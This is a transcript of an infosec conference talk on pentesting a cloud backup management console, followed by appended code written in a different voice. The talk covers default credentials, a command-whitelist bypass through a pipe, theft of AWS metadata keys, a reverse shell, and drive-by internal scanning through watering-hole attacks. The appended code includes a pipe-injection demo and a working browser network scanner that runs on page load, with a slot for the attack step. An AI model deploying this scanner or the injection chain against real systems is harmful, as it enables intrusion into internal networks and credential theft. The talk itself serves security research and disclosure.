
Thank you, thank you so much. First of all, hello to the amazing Portuguese infosec community; it's a pleasure to speak here. The very first thing I want to say is thanks a lot to all the organizers, you are doing an amazing job, thank you so much.

All right, to kick it off: yeah, it's a pentest deep dive, we are looking at a cloud backup software, maybe you read it already on the schedule. Just to tell you a little bit about me: I'm a technical project manager and team lead at Cobalt. We are a pentest-as-a-service company, so we are doing pentests using a freelancer network of around 270 pentesters, and I'm one of them; in my free time I'm doing pentesting, and in my day-to-day I'm leading the operations department. I'm also an information security researcher, a pentester and a public speaker; I'm usually speaking at infosec conferences, sharing my research, and I have around nine years of experience in information security.

Let's see what is on our to-do list. On our to-do list today, since it's the whole story of a pentest, it starts with the scope, continues with reconnaissance, then goes to the exploitation part, the fun part, and looks a little bit into remediation, which will be a little bit more generic, and then I'll keep it open for questions, and I hope you do have some.

Let's start with the disclaimer, that's the boring part, I'm sorry. Cobalt doesn't share any vulnerability information or publish any vulnerability information. The following content that you'll see is all my research and is not associated with Cobalt at all. The company that I'll talk about in the next few seconds was contacted and they have access to all vulnerability details; unfortunately they didn't really care that much, so I didn't get a read receipt, nobody replied. Responsible disclosure was attempted; unfortunately it didn't work out.

So let's have a look at the scope. We are talking about Vulnerable Ltd. Vulnerable Ltd. is a company; they deployed their internal network in AWS, like most of my clients nowadays. They really like to go into the cloud because cloud is so cool, everybody loves that, and it's also easy to manage, you can scale as you grow and stuff like that; you don't have to buy servers, all that stuff that you have to buy and put money into, that's really cool on AWS. So the client was particularly interested in checking out, assuming, I'm sorry, assuming that attackers gain access through a compromised web server, like, yeah, the web application there. That can be anything: that can be an online shop, that can be, no idea, a newspaper site or some content management system, maybe like a WordPress or something. Imagine that gets compromised now; that web server is deployed on their internal network and is externally reachable, so with access to their web server you can now spread out through the whole internal network. It's essentially an internal network assessment in the cloud, basically. And the goal of the assessment was to get access to sensitive data, as always.

So how do you do that? You start with reconnaissance, and one thing that is pretty cool when you're dealing with pretty large internal networks: you want to get something to look at pretty soon, so you start of course with nmap, I mean everybody starts with nmap, and then you start with Aquatone to get some screenshots, to get pictures that you can look at, where you can easily spot, OK, that's a Tomcat, and if we see a Tomcat, I think everybody here tries the default credentials first, and in 99% of the cases it works. It was not that easy in that case, at that time, and of course we go with Metasploit, just to go for the really, really low-hanging fruit, like EternalBlue usually always works, yeah. That's how it started here also, and that's a cool map that Aquatone actually generates when you do that, when you do the Aquatone scan. So you see hot spots, and they are similar: when you have hosts grouped, and it's a little bit bolder here, then you see they are related, so they might share the same software components, they might all be Tomcat servers or all WordPress servers or something. It's a cool grouping, and it's also kind of fancy, I mean I like it. Then it also goes a little bit more into detail about the actual services that are found, so you can scroll through and look at the services, and yeah, that's the thing we'll talk about today: it's the Zmanda Management Console, and it's a management console. When you look at it, I think it feels a little bit like the really early days of the internet; it could use a designer, I think. It's built on Apache and it's really, really ancient. And that's also something that Aquatone really does a good job at: it displays the HTTP code, it displays the web server that is used, and then some components that web server is using. You can of course then dive into details; it also captures the HTTP request headers and stuff like that, so if you want to get a little bit more into that you can do that, but it's not really needed at all; that picture already caught my attention, and now we have it a little bit bigger. So that's basically the login interface: you log in with a username and a password, then you have some checkboxes that you can check to automate some of the actions when you log in, and then there are some links to their forums and stuff. That's basically the login page.

Just to have a little bit of an explanation of what that actually does: the Zmanda Management Console is the management interface of Zmanda Cloud Backup, and Zmanda Cloud Backup is a software solution to back up your internal network to various cloud backup solutions; you can back up to S3 buckets, you can back up to Google Cloud, you can back up wherever you want, basically, and Zmanda is basically automating that. Obviously, if you want to upload all of that data to the cloud, you have to give that software access to your cloud credentials, and that's the juicy part; we'll look into that later.

But first of all, let's just Google, so we Google a little bit and have a look for any default credentials, because that's usually the first thing that you do when you see a login form: you're always wondering, did they actually change the default credentials? And yeah, of course not. The default credentials are admin/admin, I think that's very creative, and they are also documented in their public documentation, so that's pretty cool; it's basically the first Google result. After trying them out you are basically in, and it looks like that. Then you're basically going through that and having a little look at what's available here, and of course you are looking for secret keys, you're looking for all sorts of configuration files, you're looking for features that are interesting, like: can you maybe execute commands, can you maybe load configuration files, what about reporting, can you export something, or maybe CSV import/export features, can you generate PDF files, stuff like that. Because you always have to remember that this is deployed in the cloud, and it has the ability to query, to speak to the AWS metadata endpoint, and then you can extract even more keys, even more keys than the keys that you already got right now. So now you already have some cool AWS secret keys; you import them into the next tool, and you have to evaluate a little bit what you have access to; maybe with those keys you're already able to execute code, if you're lucky. In that case I was not, but you go of course a little bit further, and you want to look a little bit at what other features are available.

There was a cool feature in the Advanced tab, and that feature allowed you to execute commands. I think that's some sort of debug feature that they want to have, and it's also very dangerous; you see it's like "experts only", and since I'm an expert I looked at that, of course. They also display that only non-interactive commands are allowed, and they are very boring, so you don't want to get restricted to the commands that you can execute here. I was thinking, OK, what happens if I provide further input? Yeah, first of all a little bit sad, because it didn't work that way and I could really only execute the commands that were whitelisted there, but there's always another way. What happens if you pipe the output of a command into another command, what gets executed then? You see here the second command gets executed, so that's cool, but the second command is actually not even whitelisted, so that's working now. What happens if you do something like that? Now we have a curl request that requests secret keys from the AWS metadata endpoint, and that's not even allowed, cool; curl isn't even whitelisted. So now you have access to even more secret keys, that's cool, but you want to get code execution, like real code execution, and how do you do that? Well, yeah, you build some sort of crap command that you put in front, like you echo an "a" or something, or whatever character you want to have, something that you can just ignore, and then you pipe that, basically, into something that triggers your reverse shell. In that case it's a Python command; I'm sure there are like 200 million other ways to do that, that's just the most reliable, and it worked perfectly. So if you execute that, you get a shell, and now you have basically code execution, access to that cloud backup management server, and that's pretty cool.

Now, the thing is, you're a little bit limited: I mean, there are default credentials, but what if somebody changes them? That's pretty sad. And you also can't really automate that attack, that's also not cool. But maybe, if they don't change the default credentials, you can automate it in some sort of way. There are some prerequisites; for example, you have to know the IP address of the server, that's also something which is not ideal if you want to automate it, and you have to rely on the fact that they actually didn't change the default credentials, something that usually really works, because nobody does that. And yeah, if you chain it all together, you can basically log somebody in, because you can't really rely on the user that you social engineer actually being authenticated; often in these cases you target some sort of network engineer that has no clue about that service, so you want to make sure that just by clicking on a simple link, that network engineer with access to the internal network compromises that server. So you have to rely on default credentials, and you have to know the IP address, and then it's working really, really cool. The proof of concept write-up is available on GitHub, not right now but seconds after the talk.

But now we are talking a little bit more about automating stuff: knowledge of the IP address, that's a little bit of a tricky one. You want to have a proof of concept that scans your whole internal network for IP addresses, for hosts that are active, and then basically checks if those servers that are up are actually hosting that cloud backup management software. So how do you do that? There are some cool guys that really do amazing research around that, like [inaudible]; they developed something called JS-Recon, that's a pretty cool tool, and it allows using WebSockets to scan the internal network. It works basically with timing attacks: you can build up a WebSocket connection to an arbitrary port, and depending on how fast the readyState changes you can guess if that's open, if that's filtered or closed, and that's all you really need to know. Because once you know that service is actually online, you can start with just picking any file, any static file that you can find on that website, maybe the logo, the Zmanda logo works just great, or any other picture or file that is pretty unique to that service, and then you hard-code that in, and then you set up, no idea, you can set up an iframe or an image tag to it, just add an event handler to that and let it do something depending on whether it creates an error or not. If you do that, that works pretty amazingly. I have a little demo of how that's working for IoT cameras; I hope the video is actually loading, and it is loading, nice. That's my prior research about IoT devices, and that's basically me implementing that whole attack for an IoT camera. It's an HTTP-request-based vulnerability, it's a command injection, and you see now the network is scanned in the background.
Once the device is found, the malicious request is fired, and now you've got code execution; let's wait a little bit until the telnet service is up, and there you go. So that's the cool thing: when you keep that in mind, you can recognize that every single IoT attack that is HTTP-request-based, like if it's a GET request, if it's a POST request, doesn't really matter, you can build that using WebSockets, you build some sort of fingerprinting in there, so you can even have a whole attack framework here. You can build that for IoT devices, like in this case it was a CCTV camera, you can build in there the Zmanda backup management software, and if you build modules for that, you can have a pretty nice attack framework where you just have to trick somebody into visiting that site.

And maybe you noticed in that video, the only little downside of that is that once that scan is running, if you have a large network, that takes time, and you have to trick the user into actually doing something that doesn't bore them, so you have to provide them a video or a song or something that they read. Imagine you can also combine it with a cross-site scripting vulnerability and combine it with a watering hole attack: maybe you know that your network engineers read a specific newspaper every single morning or something like that, and you find a web application vulnerability there, you inject that malicious JavaScript code, and it's running in the background; usually they probably won't finish the article in like 10 seconds, hopefully, if it's interesting, and if they stay long enough on that, that is totally enough to scan your network.

Then getting to the remediation advice here: I mean, always change your default credentials, I'm sorry, that's not rocket science, it's pretty obvious, and still people don't do it. Then a patch management policy would be really, really helpful, so if you deploy some weird cloud management software on your network, make sure that you actually patch it; that's always a nice recommendation too. And then I think the last one is pretty cool: you can actually ask for pentest reports every single time your company purchases software or wants to deploy something; push them and ask them for, yeah, the last pentest report, did they ever do a security assessment, did they ever try to show, yeah, that they actually care about security. Make it part of the whole sales process: if you want to buy a tool, tell your procurement department, if there's no pentest report, I'm sorry, we won't buy, and that would be a cool idea already.
And then don't only request the pentest report; send it to your security guys, or to somebody who knows it, and let them interpret the pentest report. If that's looking really, really bad, maybe consider another vendor; there are so many, you don't have to go with the first one. So yeah, that's basically it. If there are any questions, I'm more than happy to answer them. [Music] [Applause]
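The "whitelisted commands only" debug feature from the exploitation part, modelled as an added example. This is not the speaker's proof of concept and not code from the backup product; the console's real filter is not on the page, so the check below is an assumption chosen to reproduce the behaviour described in the talk: separators such as `;` are rejected and only the first word is compared against the allowlist, so a pipe carries a second, unlisted command through to the shell. The allowlisted command names are also assumed. The hardened variant beside it never hands a user-controlled string to a shell, which is the fix a reviewer would ask for.

```javascript
// Added example: a naive "first word must be whitelisted" filter and why a pipe
// defeats it, next to a runner that cannot be piped into. ALLOWED and FIXED_ARGV
// are assumptions; the real console's command list is not on the page.
const { execSync, execFileSync } = require('child_process');

// Commands the hypothetical "experts only" tab permits (assumed names).
const ALLOWED = new Set(['uname', 'uptime', 'df', 'free']);

// Vulnerable check: rejects the obvious separators (';', '&&', '$()', backticks,
// newlines) but not '|', and looks only at the first token.
function naiveAllowlistCheck(cmdline) {
  if (/[;&`$\n]/.test(cmdline)) return false;
  const first = cmdline.trim().split(/\s+/)[0];
  return ALLOWED.has(first);
}

// Vulnerable runner: the whole string still reaches /bin/sh -c, so
// "uname | <anything>" passes the check and runs <anything>.
function vulnerableRun(cmdline) {
  if (!naiveAllowlistCheck(cmdline)) throw new Error('command not whitelisted');
  return execSync(cmdline, { encoding: 'utf8' });
}

// Hardened runner: the user supplies only a key; the server owns the argv and
// execFileSync runs the binary directly, with no shell to interpret a pipe.
const FIXED_ARGV = {
  uname: ['uname', '-a'],
  uptime: ['uptime'],
  df: ['df', '-h'],
  free: ['free', '-m'],
};

function hardenedRun(name) {
  const argv = FIXED_ARGV[name];
  if (!argv) throw new Error('command not whitelisted');
  const [bin, ...args] = argv;
  return execFileSync(bin, args, { encoding: 'utf8' });
}

if (require.main === module) {
  console.log('naive check, "uname; id":', naiveAllowlistCheck('uname; id'));   // false
  console.log('naive check, "uname | id":', naiveAllowlistCheck('uname | id')); // true
  console.log('vulnerable output:', vulnerableRun('uname | echo INJECTED').trim());
  console.log('hardened output:', hardenedRun('uname').trim());
  try { hardenedRun('uname | echo INJECTED'); } catch (e) { console.log('hardened:', e.message); }
}
```

The point the demo makes is that the separator blocklist is not the bug; the bug is that any user-controlled string reaches a shell at all. Mapping a short list of names to fixed argument vectors removes the pipe, the `curl` to the metadata endpoint and the reverse shell in one change.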
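The browser-side discovery chain from the automation part (enumerate the internal range, guess port state from how long a WebSocket sits in CONNECTING, confirm the product by loading one of its static images, then hand the host to an attack callback), written out as an added example. This is neither the speaker's proof of concept nor JS-Recon itself; the timing thresholds, the `/24`, the port and the asset path are illustrative assumptions, and because the page does not give the console's login form fields or command endpoint, the final step is left as a caller-supplied `onFound` callback rather than an invented request. The probes are injected so the same scan loop runs in a browser and, with fakes, offline.

```javascript
// Added example: internal-network discovery from a victim's browser, in the
// style described in the talk. Browser-only pieces (WebSocket, Image) are
// used only inside webSocketProbe/imageProbe; the scan loop is pure logic.

// Expand a CIDR into usable host addresses (network and broadcast excluded).
function hostsInCidr(cidr) {
  const [base, bitsStr] = cidr.split('/');
  const bits = Number(bitsStr);
  if (!(bits >= 16 && bits <= 32)) throw new RangeError('use a /16 or smaller range');
  const ip = base.split('.').map(Number).reduce((a, o) => ((a << 8) | o) >>> 0, 0);
  const mask = (~0 << (32 - bits)) >>> 0;
  const network = (ip & mask) >>> 0;
  const broadcast = (network | (~mask >>> 0)) >>> 0;
  const out = [];
  for (let a = network + 1; a < broadcast; a++) {
    out.push([a >>> 24, (a >>> 16) & 255, (a >>> 8) & 255, a & 255].join('.'));
  }
  return out;
}

// Classify a port from the milliseconds the socket spent in readyState CONNECTING.
// Thresholds are assumptions in the spirit of JS-Recon: a closed port is refused
// almost at once, an open non-WebSocket port keeps the socket waiting before the
// handshake fails, and a filtered port never answers inside the timeout.
function classifyPortByTiming(ms, { closedBelow = 100, filteredAbove = 5000 } = {}) {
  if (ms < closedBelow) return 'closed';
  if (ms >= filteredAbove) return 'filtered';
  return 'open';
}

const WS_CONNECTING = 0;

// Browser probe: time how long readyState stays CONNECTING (browser only).
function webSocketProbe(host, port, timeoutMs = 5000) {
  return new Promise((resolve) => {
    const t0 = performance.now();
    let ws;
    try { ws = new WebSocket(`ws://${host}:${port}/`); } catch (e) { resolve(0); return; }
    let tick;
    const timer = setTimeout(() => { clearInterval(tick); try { ws.close(); } catch (e) {} resolve(timeoutMs); }, timeoutMs);
    tick = setInterval(() => {
      if (ws.readyState !== WS_CONNECTING) {
        clearInterval(tick); clearTimeout(timer); resolve(performance.now() - t0);
      }
    }, 5);
  });
}

// Browser probe: true if a static asset unique to the product loads (browser only).
function imageProbe(url) {
  return new Promise((resolve) => {
    const img = new Image();
    img.onload = () => resolve(true);
    img.onerror = () => resolve(false);
    img.src = `${url}?cb=${Date.now()}`;   // cache-buster so a cached copy cannot lie
  });
}

// Scan loop with a small worker pool; probePort/probeAsset are injected.
async function scanForService({ cidr, port, assetPath, probePort, probeAsset, onFound, concurrency = 16 }) {
  const hosts = hostsInCidr(cidr);
  const found = [];
  let next = 0;
  async function worker() {
    while (next < hosts.length) {
      const host = hosts[next++];
      if (classifyPortByTiming(await probePort(host, port)) !== 'open') continue;
      const base = `http://${host}:${port}`;
      if (!(await probeAsset(base + assetPath))) continue;   // open, but not our product
      found.push(base);
      if (onFound) await onFound(base);
    }
  }
  await Promise.all(Array.from({ length: concurrency }, worker));
  return found;
}

// In a browser this kicks the scan off as soon as the page is loaded.
if (typeof window !== 'undefined') {
  scanForService({
    cidr: '10.0.0.0/24', port: 8080, assetPath: '/images/logo.png',   // assumed values
    probePort: webSocketProbe, probeAsset: imageProbe,
    onFound: (base) => console.log('candidate at', base),           // attack step goes here
  });
}
```

The talk's last step, a default-credential login followed by the command request, belongs in `onFound`; it is left to the caller because those request details are not on the page. The worker pool is what keeps a `/24` inside the time a reader spends on one article, and the image probe is what separates "something listens on that port" from "this is the backup console".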